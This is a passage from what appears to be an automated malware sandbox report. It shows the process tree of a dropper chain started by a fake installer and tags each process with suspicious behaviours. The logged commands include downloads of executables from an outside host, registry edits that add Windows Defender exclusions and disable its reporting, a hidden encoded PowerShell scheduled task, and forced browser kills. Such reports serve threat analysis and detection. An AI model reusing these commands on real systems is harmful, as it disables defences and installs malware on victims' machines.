2204 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2032 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2032 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2032 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 4092 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 4092 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 4092 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1336 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1336 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1336 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 760 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 760 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 760 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 884 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 884 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 884 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1472 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1472 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1472 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 3296 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 3296 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 3296 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2120 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2120 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2120 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1348 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1348 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1348 2088 setup_install.exe cmd.exe PID 1348 wrote to memory of 3888 1348 cmd.exe Tue0289c99651.exe PID 1348 wrote to memory of 3888 1348 cmd.exe Tue0289c99651.exe PID 2032 wrote to memory of 1632 2032 cmd.exe Tue02976fcdf1.exe PID 2032 wrote to memory of 1632 2032 cmd.exe Tue02976fcdf1.exe PID 1336 wrote to memory of 3004 1336 cmd.exe Tue02dc626f48.exe PID 1336 wrote to memory of 3004 1336 cmd.exe Tue02dc626f48.exe PID 1336 wrote to memory of 3004 1336 cmd.exe Tue02dc626f48.exe PID 2204 wrote to memory of 1560 2204 cmd.exe Tue028a363eda.exe PID 2204 wrote to memory of 1560 2204 cmd.exe Tue028a363eda.exe PID 2204 wrote to memory of 1560 2204 cmd.exe Tue028a363eda.exe PID 884 wrote to memory of 3120 884 cmd.exe Tue02705f9c2b455.exe PID 884 wrote to memory of 3120 884 cmd.exe Tue02705f9c2b455.exe PID 3988 wrote to memory of 1692 3988 cmd.exe powershell.exe PID 3988 wrote to memory of 1692 3988 cmd.exe powershell.exe PID 3988 wrote to memory of 1692 3988 cmd.exe powershell.exe PID 1760 wrote to memory of 1664 1760 cmd.exe Tue02522f9ea0b1.exe PID 1760 wrote to memory of 1664 1760 cmd.exe Tue02522f9ea0b1.exe PID 1760 wrote to memory of 1664 1760 cmd.exe Tue02522f9ea0b1.exe PID 1472 wrote to memory of 3932 1472 cmd.exe Tue02b2110095fe706.exe PID 1472 wrote to memory of 3932 1472 cmd.exe Tue02b2110095fe706.exe PID 1472 wrote to memory of 3932 1472 cmd.exe Tue02b2110095fe706.exe PID 3296 wrote to memory of 3624 3296 cmd.exe Tue026e182673.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02976fcdf1.exeTue02976fcdf1.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0289c99651.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue0289c99651.exeTue0289c99651.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue029560e6534e190c.exeTue029560e6534e190c.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 17807⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e182673.exeTue026e182673.exe /mixone6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 4567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 6567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 7487⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 7887⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 8767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 10527⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 11207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 12927⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 7807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 6287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 12607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 7567⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02b2110095fe706.exeTue02b2110095fe706.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-B64KF.tmp\Tue02b2110095fe706.tmp"C:\Users\Admin\AppData\Local\Temp\is-B64KF.tmp\Tue02b2110095fe706.tmp" /SL5="$7004E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02b2110095fe706.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02705f9c2b455.exeTue02705f9c2b455.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exeTue026e94a5005f8.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exeC:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02dc626f48.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exeTue02dc626f48.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02520f255d0ba43a.exeTue02520f255d0ba43a.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\t2y2IyXDHgdSnEi_aVjgEuJo.exe"C:\Users\Admin\Pictures\Adobe Films\t2y2IyXDHgdSnEi_aVjgEuJo.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe"C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\3A83.bat "C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe""8⤵
-
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/4460_1647529798_1063.exe" "4460_1647529798_1063.exe" "" "" "" "" "" ""9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/1245_1647445154_9529.exe" "1245_1647445154_9529.exe" "" "" "" "" "" ""9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1348\4460_1647529798_1063.exe4460_1647529798_1063.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1348\1245_1647445154_9529.exe1245_1647445154_9529.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\Pictures\Adobe Films\6zYhJZFz7hGRxH5AOfPbfb1q.exe"C:\Users\Admin\Pictures\Adobe Films\6zYhJZFz7hGRxH5AOfPbfb1q.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe"C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 358⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 359⤵
- Delays execution with timeout.exe
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
-
C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe"C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 6248⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 6608⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 6688⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 8248⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 12248⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 12368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 11328⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4B3of8v9JlXMrHyDZ8ywGtP7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4B3of8v9JlXMrHyDZ8ywGtP7.exe" /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 14448⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\PhsHMlF6tpL4cItkeiIXvtL7.exe"C:\Users\Admin\Pictures\Adobe Films\PhsHMlF6tpL4cItkeiIXvtL7.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\iyYRA2zjB7qX2F6ikmR6SV3S.exe"C:\Users\Admin\Documents\iyYRA2zjB7qX2F6ikmR6SV3S.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\bt6RuJUGA2_XYKNjgPQ5G4KD.exe"C:\Users\Admin\Pictures\Adobe Films\bt6RuJUGA2_XYKNjgPQ5G4KD.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\gsqNVzo3JRFSA0n3M3dgMnUr.exe"C:\Users\Admin\Pictures\Adobe Films\gsqNVzo3JRFSA0n3M3dgMnUr.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 58010⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 62410⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 65210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 74010⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 78810⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Program crash
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 73210⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\6AMZrD3zpEI3XVpw_LFdRZFT.exe"C:\Users\Admin\Pictures\Adobe Films\6AMZrD3zpEI3XVpw_LFdRZFT.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\a6U_WGm.9B10⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B11⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B13⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\nXFeAbvXLg7Hi4X0yNObClwf.exe"C:\Users\Admin\Pictures\Adobe Films\nXFeAbvXLg7Hi4X0yNObClwf.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\43iKPl1AdRKm4gLJtv_LcXoy.exe"C:\Users\Admin\Pictures\Adobe Films\43iKPl1AdRKm4gLJtv_LcXoy.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSBC53.tmp\Install.exe.\Install.exe10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD55A.tmp\Install.exe.\Install.exe /S /site_id "525403"11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&13⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3214⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6414⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&13⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3214⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6414⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpqMyinlc" /SC once /ST 06:17:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="12⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpqMyinlc"12⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpqMyinlc"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ldSVNmI.exe\" j6 /site_id 525403 /S" /V1 /F12⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Q9_E6thG7mij2_I43zmvk8Rh.exe"C:\Users\Admin\Pictures\Adobe Films\Q9_E6thG7mij2_I43zmvk8Rh.exe"9⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\6LMUTF51wzLnUCA_NSsUzVYC.exe"C:\Users\Admin\Pictures\Adobe Films\6LMUTF51wzLnUCA_NSsUzVYC.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"10⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\82E1H.exe"C:\Users\Admin\AppData\Local\Temp\82E1H.exe"11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\HLA0C.exe"C:\Users\Admin\AppData\Local\Temp\HLA0C.exe"11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\D0826.exe"C:\Users\Admin\AppData\Local\Temp\D0826.exe"11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\8860B.exe"C:\Users\Admin\AppData\Local\Temp\8860B.exe"11⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\4A4I5.exe"C:\Users\Admin\AppData\Local\Temp\4A4I5.exe"11⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\HSCN.H12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\HSCN.H13⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\HSCN.H14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\HSCN.H15⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\LI3FA3IG15M57IM.exehttps://iplogger.org/1QuEf711⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\pub1.exe"C:\Users\Admin\AppData\Local\Temp\pub1.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\zhangyan.exe"C:\Users\Admin\AppData\Local\Temp\zhangyan.exe"10⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\zhangyan.exe"C:\Users\Admin\AppData\Local\Temp\zhangyan.exe" -h11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe"C:\Users\Admin\AppData\Local\Temp\a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe"11⤵
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\7929_1647444188_3653.exe"C:\Users\Admin\AppData\Local\Temp\7929_1647444188_3653.exe"10⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\siww1049.exe"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"10⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5740 -s 26811⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-25TFO.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-25TFO.tmp\setup.tmp" /SL5="$D004E,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"11⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A7S3K.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A7S3K.tmp\setup.tmp" /SL5="$1903C6,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\is-KSM7G.tmp\nthost.exe"C:\Users\Admin\AppData\Local\Temp\is-KSM7G.tmp\nthost.exe" 8114⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\inst200.exe"C:\Users\Admin\AppData\Local\Temp\inst200.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\udontsay.exe"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\pK26geiEDlpwB\Soft706.exeC:\Users\Admin\AppData\Local\Temp\pK26geiEDlpwB\Soft706.exe11⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--B4lBeMRI"12⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exeC:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffc0af8dec0,0x7ffc0af8ded0,0x7ffc0af8dee013⤵
-
